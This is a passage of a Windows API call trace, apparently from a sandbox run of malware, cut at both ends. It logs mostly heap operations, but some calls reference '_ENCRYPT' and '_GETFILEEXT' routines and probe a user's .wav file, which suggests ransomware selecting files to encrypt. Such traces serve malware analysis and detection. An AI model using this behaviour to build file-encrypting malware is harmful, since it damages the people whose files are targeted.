Size=0x214) returned 0x7b87d0 [0039.130] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0039.130] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0039.130] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0039.130] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0039.130] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0039.130] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0039.130] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0039.130] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0039.130] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0039.130] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0039.130] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0039.130] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0039.130] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xaa0008, cbMultiByte=66, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 66 [0039.130] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x84) returned 0x7bbc00 [0039.130] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xaa0008, cbMultiByte=66, lpWideCharStr=0x7bbc00, cchWideChar=66 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\wiOEx9T.wav") returned 66 [0039.130] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0039.130] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x90) returned 0x7c38b0 [0039.130] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7bbc00 | out: hHeap=0x770000) returned 1 [0039.130] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa0008 | out: hHeap=0x770000) returned 1 [0039.130] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0039.130] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0039.130] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0039.130] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0039.130] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0039.130] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0039.131] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0039.131] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0039.131] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0039.131] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0039.131] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0039.131] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0039.131] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0039.131] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0039.131] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0039.131] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0039.131] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0039.131] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0039.131] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0039.131] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0039.131] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0039.131] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0039.131] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0039.131] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0039.131] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0039.131] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0039.131] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0039.131] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0039.132] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0039.132] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0039.132] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0039.132] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0039.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0039.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0039.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0039.132] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0039.132] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0039.132] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0039.132] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0039.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0039.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0039.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0039.132] FreeLibrary (hLibModule=0x76e10000) returned 1 [0039.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0039.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0039.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0039.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0039.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0039.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0039.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0039.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0039.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0039.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0039.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0039.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0039.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0039.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0039.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0039.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0039.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0039.133] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0039.133] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0039.133] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0039.133] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0039.133] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0039.133] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0039.133] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0039.133] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0039.133] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0039.133] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0039.133] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0039.133] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0039.133] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0039.133] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0039.133] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0039.133] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0039.133] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0039.133] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0039.133] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0039.133] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0039.133] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0039.133] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5bb8 | out: hHeap=0x770000) returned 1 [0039.133] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0039.133] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0039.133] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0039.133] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0039.133] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0039.133] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0039.133] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0039.133] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0039.133] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0039.133] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0039.133] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0039.134] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0039.134] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0039.134] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0039.134] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0039.134] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0039.134] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0039.134] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0039.134] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2080 [0039.134] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0039.134] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0039.134] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0039.134] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0039.134] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0039.134] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0039.134] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0039.134] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0039.134] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0039.134] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0039.134] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0039.134] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0039.134] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0039.134] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0039.134] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0039.134] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0039.134] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0039.134] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0039.134] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0039.134] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0039.134] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0039.135] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0039.135] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0039.135] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0039.135] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0039.135] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0039.135] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0039.135] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0039.135] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0039.135] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0039.135] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0039.135] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0039.135] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0039.135] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0039.135] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0039.135] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0039.135] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0039.135] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0039.135] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0039.135] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0039.135] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0039.135] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0039.135] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0039.135] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0039.135] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0039.135] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0039.135] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0039.135] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0039.135] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ccb8 [0039.136] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x88ccb8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0039.136] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0039.136] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0039.136] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0039.136] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0039.136] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0039.136] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0039.136] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0039.136] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0039.136] CloseHandle (hObject=0x140) returned 1 [0039.136] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0039.136] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0039.136] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0039.136] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0039.136] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0039.136] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0039.136] FreeLibrary (hLibModule=0x76e10000) returned 1 [0039.136] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0039.136] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0039.136] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0039.136] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0039.136] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0039.136] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0039.136] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0039.136] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0039.136] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0039.136] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0039.137] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0039.137] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0039.137] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0039.137] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0039.137] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0039.137] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0039.137] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0039.137] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0039.137] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0039.137] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0039.137] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0039.137] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0039.137] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0039.137] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0039.137] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0039.137] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0039.137] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.137] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0039.137] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0039.137] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0039.137] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="av", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0039.137] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wav", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0039.137] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wav", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0039.137] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.137] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.137] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.138] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\wiOEx9T.wav", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa57f2460, ftCreationTime.dwHighDateTime=0x1d5bd3f, ftLastAccessTime.dwLowDateTime=0x5a013ad0, ftLastAccessTime.dwHighDateTime=0x1d5b77e, ftLastWriteTime.dwLowDateTime=0x5a013ad0, ftLastWriteTime.dwHighDateTime=0x1d5b77e, nFileSizeHigh=0x0, nFileSizeLow=0x112e1, dwReserved0=0x0, dwReserved1=0x777648, cFileName="wiOEx9T.wav", cAlternateFileName="")) returned 0x7c20c0 [0039.138] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0039.138] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.138] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\wiOEx9T.wav", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa57f2460, ftCreationTime.dwHighDateTime=0x1d5bd3f, ftLastAccessTime.dwLowDateTime=0x5a013ad0, ftLastAccessTime.dwHighDateTime=0x1d5b77e, ftLastWriteTime.dwLowDateTime=0x5a013ad0, ftLastWriteTime.dwHighDateTime=0x1d5b77e, nFileSizeHigh=0x0, nFileSizeLow=0x112e1, dwReserved0=0x0, dwReserved1=0x777648, cFileName="wiOEx9T.wav", cAlternateFileName="")) returned 0x7c20c0 [0039.138] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0039.138] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, 